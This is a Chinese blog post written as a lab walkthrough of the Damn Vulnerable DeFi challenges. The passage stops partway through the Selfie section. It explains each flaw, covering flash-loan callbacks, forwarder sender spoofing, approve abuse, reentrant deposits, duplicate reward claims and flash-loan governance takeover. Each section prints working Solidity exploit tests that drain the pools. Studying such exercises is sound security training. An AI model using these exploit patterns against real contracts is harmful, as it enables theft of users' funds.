<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"heygap.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="继续刷题">
<meta property="og:type" content="article">
<meta property="og:title" content="blockchain - Damn Vulnerable Defi 靶场复现">
<meta property="og:url" content="http://heygap.github.io/2024/08/26/blockchain%20-%20DVD%E9%9D%B6%E5%9C%BA%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="HeyGap&#39;s_Blog">
<meta property="og:description" content="继续刷题">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-08-26T12:37:00.000Z">
<meta property="article:modified_time" content="2024-08-30T02:34:16.360Z">
<meta property="article:author" content="HeyGap">
<meta property="article:tag" content="Blockchain">
<meta property="article:tag" content="Smart Contract">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://heygap.github.io/2024/08/26/blockchain%20-%20DVD%E9%9D%B6%E5%9C%BA%E5%A4%8D%E7%8E%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>blockchain - Damn Vulnerable Defi 靶场复现 | HeyGap's_Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">HeyGap's_Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Be a positive learner</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

  <a href="https://github.com/HeyGap" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://heygap.github.io/2024/08/26/blockchain%20-%20DVD%E9%9D%B6%E5%9C%BA%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="HeyGap">
      <meta itemprop="description" content="An undergraduate student of Cybersecurity at SDU.">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="HeyGap's_Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          blockchain - Damn Vulnerable Defi 靶场复现
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-08-26 20:08:00" itemprop="dateCreated datePublished" datetime="2024-08-26T20:37:00+08:00">2024-08-26</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-08-30 10:08:36" itemprop="dateModified" datetime="2024-08-30T10:34:16+08:00">2024-08-30</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Blockchain/" itemprop="url" rel="index"><span itemprop="name">Blockchain</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <blockquote class="blockquote-center">
继续刷题
</blockquote>
<span id="more"></span>
<h1 id="环境设置">[0] 环境设置</h1>
<p>我是用 forge 搭建的靶场，貌似还可以用 npm
之类的搭建，这样做题就直接用 web3.js 交互就可以了。</p>
<p>根据<a
target="_blank" rel="noopener" href="https://github.com/theredguild/damn-vulnerable-defi">官方说明</a>搭建靶场环境。forge
可能由于网络原因会失败，多安装几次就好了</p>
<p><code>forge build</code>之后，本地有这样几个文件夹比较重要：</p>
<p><code>src</code>: 漏洞源码。要做的题目都在这里面</p>
<p><code>test</code>:
题解。如果想要解题，必须运行<code>forge test --mp test/&lt;题目名称&gt;/&lt;题目名称&gt;.t.sol -vv</code>，-vv是为了打印
emit
log，方便我们调试。而我们的攻击poc就要写在上面这个.t.sol文件的test_<题目名称>()这个函数中。</p>
<h1 id="unstoppable">[1] Unstoppable</h1>
<blockquote>
<p>漏洞类型：revert条件设置不当</p>
</blockquote>
<p>本题我们的目标是攻击闪电贷合约，让这个闪电贷在任何时候都无法工作。</p>
<p>闪电贷（Flash
Loan）是一种无需抵押的贷款形式，广泛用于去中心化金融（DeFi）领域。它的特别之处在于，贷款的整个过程（借款、使用资金、还款）必须在同一笔交易中完成。如果在交易结束时贷款没有被偿还，整个交易将被回滚，确保贷款人不会承担任何风险。</p>
<p>我们分析代码之后可以将漏洞定位在 flashLoan
函数里，因为只有当这个函数失败，monitor 里的 checkFlashLoan 才会 emit
一个 false。</p>
<p>而想要让 flashLoan 失败，有四个触发点：</p>
<ol type="1">
<li><p><code>if (amount == 0) revert InvalidAmount(0);</code></p></li>
<li><p><code>if (address(asset) != _token) revert UnsupportedCurrency();</code></p></li>
<li><p><code>if (convertToShares(totalSupply) != balanceBefore) revert InvalidBalance();</code></p></li>
<li><p><code>if ( ... != keccak256("IERC3156FlashBorrower.onFlashLoan")) &#123;revert CallbackFailed();&#125;</code></p></li>
</ol>
<p>第一个点，amount是传参，不是我们想要改变的状态变量</p>
<p>第二个点，asset在整个合约中除了构造函数有改变以外，没有我们可以控制的点</p>
<p>第四个点，这个函数签名不正确，这也是我们无法控制的。</p>
<p>所以很明显，我们需要攻击第三点。但为什么会莫名其妙有第三点这个限制？我们仔细来分析一下：</p>
<p>首先，balanceBefore 是 totalAssets() 的返回值，assets
是闪电贷合约里剩余的代币数目（注意这里是代币，而不是实际的
ether），supply 是闪电贷合约能供给的数目上限，也就是一开始给的
1_000_000e18 个 ERC20 token（DVT），这个数目是不会变的。</p>
<p>我们一开始拥有 10 个 DVT，如果给闪电贷合约转 1 个 DVT
的话，这里的convertToShares 函数返回值就永远是 999999999999999999999999
了,此时就永远关停这个闪电贷了。</p>
<p>exp 如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function test_unstoppable() public checkSolvedByPlayer &#123;</span><br><span class="line">    require(vault.convertToShares(vault.totalSupply()) == vault.totalAssets(),&quot;not equal&quot;);</span><br><span class="line">    emit log_named_uint(&quot;Total Supply&quot;, vault.totalSupply());</span><br><span class="line">    emit log_named_uint(&quot;Total Assets&quot;, vault.totalAssets());</span><br><span class="line">    require(token.transfer(address(vault), 1 wei));</span><br><span class="line">    emit log_named_uint(&quot;calc result&quot;, vault.convertToShares(vault.totalSupply()));</span><br><span class="line">    emit log_named_uint(&quot;Total Supply&quot;, vault.totalSupply());</span><br><span class="line">    emit log_named_uint(&quot;Total Assets&quot;, vault.totalAssets());</span><br><span class="line">    require(vault.convertToShares(vault.totalSupply()) != vault.totalAssets(),&quot;equal&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我突然意识到这个闪电贷是不是只要接收到 fee 立刻就 dead 了。。</p>
<h1 id="naivereceiver">[2] NaiveReceiver</h1>
<blockquote>
<p>漏洞类型：权限设置错误</p>
</blockquote>
<p>这道题要求我们把 receiver 里的 10 WETH 和 pool 里的 1000 WETH
全转移到 recovery 账户中。最后 isSolved 有四条限制：</p>
<ol type="1">
<li><p>player 调用的交易小于等于 2 条</p></li>
<li><p>receiver 的 weth 余额为0</p></li>
<li><p>pool 的 weth 余额为0</p></li>
<li><p>recovery 的 weth 余额为 1010</p></li>
</ol>
<p>很明显能看到 NaiveReceiverPool 合约中的 withdraw
权限设置的不对，任何人都可以调用这个函数取款。</p>
<p>但新版本的 solidity feature 卡了我好久...原来 0.8.0
之后的上溢/下溢都会自动检测了..也就是说没办法直接通过withdraw直接提款。</p>
<p>但这个合约还自己实现了 _msgSender 函数，当调用者是 trustedForwarder
时，_msgSender 函数就会将 msg.data的 最后 20byte
当作地址返回。也就是说，我们必须要通过 trustedForwarder 的 execute
方法来间接调用 withdraw。</p>
<p>除此之外，我们知道 deposits[deployer] 是有 1000WETH
的，deposits[receiver] 也有
10WETH，所以我们就有如下两种方法来转走这两个合约的 WETH：</p>
<p>第一种是通过闪电贷的 fee，把 receiver 里的 10WETH 转移到 deployer
中，然后一口气提干净。</p>
<p>第二种是提取一次 deployer，提取一次 receiver</p>
<p>但无论以上哪一种方法，都需要绕过上述的第一条限制：交易数小于等于 2
条，而这就用到了 Multicall 合约里的 multicall 方法了。</p>
<p>我们看第一种方法：调用 10 次 flashLoan，交 10 次 1WETH
的手续费，就能把 WETH 汇总在 deployer 的 deposits 中。不过这 10
次交易需要用 multicall
一起执行，不然会超出第一条限制的要求。然后，我们再通过 execute 调用
withdraw，就可以把这里面的存款全都转到 recovery
中了。不过这里我们选择把两条交易合并作一条，也就是把 withdraw 的 abi
编码与前10条 flashLoan 的编码合在一起。exp如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">function test_naiveReceiver() public checkSolvedByPlayer &#123;</span><br><span class="line">    bytes[] memory callData = new bytes[](11);</span><br><span class="line">    for (uint256 i = 0; i &lt; 10; i++) &#123;</span><br><span class="line">        callData[i] = abi.encodeCall(NaiveReceiverPool.flashLoan, (receiver, address(weth), 0, bytes(&quot;&quot;)));</span><br><span class="line">    &#125;</span><br><span class="line">    callData[10] = abi.encodePacked(abi.encodeCall(NaiveReceiverPool.withdraw, (WETH_IN_POOL + WETH_IN_RECEIVER, payable(recovery)));</span><br><span class="line">        bytes32(uint256(uint160(deployer))),</span><br><span class="line">    );</span><br><span class="line">    bytes memory multicallData = abi.encodeCall(Multicall.multicall, callData);</span><br><span class="line">    BasicForwarder.Request memory request = BasicForwarder.Request(&#123;</span><br><span class="line">        from: player,</span><br><span class="line">        target: address(pool),</span><br><span class="line">        value: 0,</span><br><span class="line">        gas: 1e7,</span><br><span class="line">        nonce: forwarder.nonces(player),</span><br><span class="line">        data: multicallData,</span><br><span class="line">        deadline: block.timestamp + 1 days</span><br><span class="line">    &#125;);</span><br><span class="line">    bytes32 requestHash = keccak256(</span><br><span class="line">        abi.encodePacked(</span><br><span class="line">            &quot;\x19\x01&quot;,</span><br><span class="line">            forwarder.domainSeparator(),</span><br><span class="line">            forwarder.getDataHash(request)</span><br><span class="line">        )</span><br><span class="line">    );</span><br><span class="line">    (uint8 v, bytes32 r, bytes32 s)= vm.sign(playerPk ,requestHash);</span><br><span class="line">    bytes memory signature = abi.encodePacked(r, s, v);</span><br><span class="line">    forwarder.execute(request, signature);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h1 id="truster">[3] Truster</h1>
<p>这道题的合约代码量很小，就实现了一个闪电贷，让我们通过闪电贷的交易过程，把合约里的钱都转走。</p>
<p>想转走代币一共有两种方法，第一种是直接让可信用户调用 transfer
函数，第二种是让恶意用户成为可信用户后，再通过恶意用户转账。由于
flashLoan 设置了代币数目检查，所以我们没办法在 flashLoan 的
target.functionCall 中直接调用 transfer，但我们可以采取
approve，让恶意合约有操控代币的权限。</p>
<p>exp 如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">contract TrusterExploiter &#123;</span><br><span class="line">    TrusterLenderPool public pool;</span><br><span class="line">    DamnValuableToken public token;</span><br><span class="line">    address recovery;</span><br><span class="line"></span><br><span class="line">    constructor(TrusterLenderPool _pool, DamnValuableToken _token, address _recovery) &#123;</span><br><span class="line">        pool = _pool;</span><br><span class="line">        token = _token;</span><br><span class="line">        recovery = _recovery;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function attack() public returns (bool) &#123;</span><br><span class="line">        require(pool.flashLoan(</span><br><span class="line">            0,</span><br><span class="line">            address(this),</span><br><span class="line">            address(token),</span><br><span class="line">            abi.encodeCall(token.approve,(address(this), 1_000_000e18))</span><br><span class="line">        ));</span><br><span class="line">        token.transferFrom(address(pool), address(this), 1_000_000e18);</span><br><span class="line">        token.transfer(recovery, 1_000_000e18);</span><br><span class="line"></span><br><span class="line">        return true;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract TrusterChallenge is Test &#123;</span><br><span class="line">    ...</span><br><span class="line">    function test_truster() public checkSolvedByPlayer &#123;</span><br><span class="line">        TrusterExploiter exploiter = new TrusterExploiter(pool, token, recovery);</span><br><span class="line">        require(exploiter.attack());</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h1 id="side-entrance">[4] Side Entrance</h1>
<p>这题跟上一题很相似，但是上一题用的是代币，这一题就完完全全用的 ether
了。不过我们可以在
<code>IFlashLoanEtherReceiver(msg.sender).execute&#123;value: amount&#125;();</code>
里将贷款来的钱再用 deposit 存入 SideEntranceLenderPool
合约中，这样不仅不会影响 RepayFailed，还可以让
balances[IFlashLoanEtherReceiver] = 1000，之后我们 withdraw
即可成功提款，然后转账给 recovery 就好了。exp 如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">contract IFlashLoanEtherReceiver &#123;</span><br><span class="line">    address player;</span><br><span class="line">    address recovery;</span><br><span class="line">    SideEntranceLenderPool pool;</span><br><span class="line"></span><br><span class="line">    constructor(SideEntranceLenderPool _pool, address _player, address _recovery) &#123;</span><br><span class="line">        pool = _pool;</span><br><span class="line">        player = _player;</span><br><span class="line">        recovery = _recovery;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function execute() external payable &#123;</span><br><span class="line">        pool.deposit&#123;value: msg.value&#125;();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function callFlashLoan(uint256 amount) public &#123;</span><br><span class="line">        pool.flashLoan(amount);</span><br><span class="line">        pool.withdraw();</span><br><span class="line">        payable(recovery).transfer(amount);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    receive() external payable &#123;&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract SideEntranceChallenge is Test &#123;</span><br><span class="line">    ...</span><br><span class="line">    function test_sideEntrance() public checkSolvedByPlayer &#123;</span><br><span class="line">        IFlashLoanEtherReceiver receiver = new IFlashLoanEtherReceiver(pool, player, recovery);</span><br><span class="line">        receiver.callFlashLoan(1000e18);</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h1 id="the-rewarder">[5] The Rewarder</h1>
<p>漏洞在 claimRewards 里，同一次 claim 多个相同的账户不会有问题...</p>
<p>因为第一次调用，address(token) ==
address(0)，不会进入_setClaimed，之后的调用 token ==
inputTokens[inputClaim.tokenIndex]，进入 else
分支，也不会进入_setClaimed，等到下一种代币的时候，你就算把我上一个代币
setClaimed 也没用了。</p>
<p>感觉还是审代码的耐心不够..不清楚 merkel tree
的工作原理，想一笔调用干净，但每次 claim 的 amount 也要完全符合 json
文件里的 amount，所以只能多笔。</p>
<p>那既然想到多笔调出来，就肯定要研究 claimRewards
函数，然后模拟一下就能发现这个 if 判断条件有问题。</p>
<p>沉下心来，欲速则不达。</p>
<p>exp如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">function test_theRewarder() public checkSolvedByPlayer &#123;</span><br><span class="line">        uint PLAYER_DVT_CLAIM_AMOUNT = 11524763827831882;</span><br><span class="line">        uint PLAYER_WETH_CLAIM_AMOUNT = 1171088749244340;</span><br><span class="line"></span><br><span class="line">        bytes32[] memory dvtLeaves = _loadRewards(&quot;/test/the-rewarder/dvt-distribution.json&quot;);</span><br><span class="line">        bytes32[] memory wethLeaves = _loadRewards(&quot;/test/the-rewarder/weth-distribution.json&quot;);</span><br><span class="line"></span><br><span class="line">        uint dvtTxCount = TOTAL_DVT_DISTRIBUTION_AMOUNT / PLAYER_DVT_CLAIM_AMOUNT;</span><br><span class="line">        uint wethTxCount = TOTAL_WETH_DISTRIBUTION_AMOUNT / PLAYER_WETH_CLAIM_AMOUNT;</span><br><span class="line">        uint totalTxCount = dvtTxCount + wethTxCount;</span><br><span class="line"></span><br><span class="line">        IERC20[] memory tokensToClaim = new IERC20[](2);</span><br><span class="line">        tokensToClaim[0] = IERC20(address(dvt));</span><br><span class="line">        tokensToClaim[1] = IERC20(address(weth));</span><br><span class="line"></span><br><span class="line">        // Create Alice&#x27;s claims</span><br><span class="line">        Claim[] memory claims = new Claim[](totalTxCount);</span><br><span class="line"></span><br><span class="line">        for (uint i = 0; i &lt; totalTxCount; i++) &#123;</span><br><span class="line">            if (i &lt; dvtTxCount) &#123;</span><br><span class="line">                claims[i] = Claim(&#123;</span><br><span class="line">                    batchNumber: 0, // claim corresponds to first DVT batch</span><br><span class="line">                    amount: PLAYER_DVT_CLAIM_AMOUNT,</span><br><span class="line">                    tokenIndex: 0, // claim corresponds to first token in `tokensToClaim` array</span><br><span class="line">                    proof: merkle.getProof(dvtLeaves, 188) // Alice&#x27;s address is at index 2</span><br><span class="line">                &#125;);</span><br><span class="line">            &#125; else &#123;</span><br><span class="line">                claims[i] = Claim(&#123;</span><br><span class="line">                    batchNumber: 0, // claim corresponds to first DVT batch</span><br><span class="line">                    amount: PLAYER_WETH_CLAIM_AMOUNT,</span><br><span class="line">                    tokenIndex: 1, // claim corresponds to first token in `tokensToClaim` array</span><br><span class="line">                    proof: merkle.getProof(wethLeaves, 188) // Alice&#x27;s address is at index 2</span><br><span class="line">                &#125;);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        distributor.claimRewards(&#123;</span><br><span class="line">            inputClaims: claims,</span><br><span class="line">            inputTokens: tokensToClaim</span><br><span class="line">        &#125;);</span><br><span class="line"></span><br><span class="line">        dvt.transfer(recovery, dvt.balanceOf(player));</span><br><span class="line">        weth.transfer(recovery, weth.balanceOf(player));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h1 id="selfie">[6] Selfie</h1>
<p>这道题实现了个 fancy governance mechanism，如果我们通过
governance.executeAction 调用
emergencyExit(player)，应该就可以提取所有的钱了。</p>
<p>主要问题有两个，第一个是绕过 queueAction 里的
_hasEnoughVotes，这个可以通过在 onFlashLoan 里调用 queueAction
来实现</p>
<p>第二个问题是要绕过 timestamp，让 timedelta 大于 2
days。这个我实在想不出来了，我觉得现实中应该就是隔两天之后再调用，就能绕过了吧。</p>
<p>看完别人的wp，居然直接用vm.warp(block.timestamp + 2
days);绕过了...好吧，exp如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">import &#123;IERC3156FlashBorrower&#125; from &quot;openzeppelin-contracts/contracts/interfaces/IERC3156FlashBorrower.sol&quot;;</span><br><span class="line"></span><br><span class="line">contract Expoliter is IERC3156FlashBorrower &#123;</span><br><span class="line">    bytes32 private constant CALLBACK_SUCCESS = keccak256(&quot;ERC3156FlashBorrower.onFlashLoan&quot;);</span><br><span class="line">    address recovery;</span><br><span class="line">    uint256 actionId;</span><br><span class="line"></span><br><span class="line">    uint256 constant TOKEN_INITIAL_SUPPLY = 2_000_000e18;</span><br><span class="line">    uint256 constant TOKENS_IN_POOL = 1_500_000e18;</span><br><span class="line"></span><br><span class="line">    DamnValuableVotes token;</span><br><span class="line">    SimpleGovernance governance;</span><br><span class="line">    SelfiePool pool;</span><br><span class="line">    constructor(DamnValuableVotes _token, SimpleGovernance _governance, SelfiePool _pool, address _recovery) &#123;</span><br><span class="line">        token = _token;</span><br><span class="line">        governance = _governance;</span><br><span class="line">        pool = _pool;</span><br><span class="line">        recovery = _recovery;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function onFlashLoan(address receiver, address _token, uint256 _amount, uint256 nonce, bytes calldata _data) public returns (bytes32) &#123;</span><br><span class="line">        token.delegate(address(this));</span><br><span class="line">        token.approve(address(pool), TOKENS_IN_POOL);</span><br><span class="line">        actionId = governance.queueAction(address(pool), 0, abi.encodeCall(pool.emergencyExit, 